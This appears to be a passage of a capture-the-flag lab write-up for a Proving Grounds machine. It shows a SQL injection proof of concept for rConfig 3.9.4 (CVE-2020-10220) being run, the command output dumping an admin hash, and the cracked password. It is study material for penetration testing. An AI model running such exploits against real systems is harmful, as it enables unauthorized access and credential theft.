SQL Injection
The target rConfig instance is vulnerable to CVE-2020-10220 due to its outdated version; 3.9.4
Exploit Script
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/quackerJack/exploits-rconfig]
└─$ python3 rconfig_sqli.py https://$IP:8081
rconfig 3.9 - SQL Injection PoC
[+] Triggering the payloads on https://192.168.144.57:8081/commands.inc.php
[+] Extracting the current DB name :
rconfig
[+] Extracting 10 first users :
admin:1:dc40b85276a1f4d7cb35f154236aa1b2
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
[+] Extracting 10 first devices :
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Done
Executing the exploit script exfiltrates the admin
credential; admin:1:dc40b85276a1f4d7cb35f154236aa1b2
Password Cracking
Password hashes cracked for the
admin
user;abgrtyu
The credential may be user for exploitation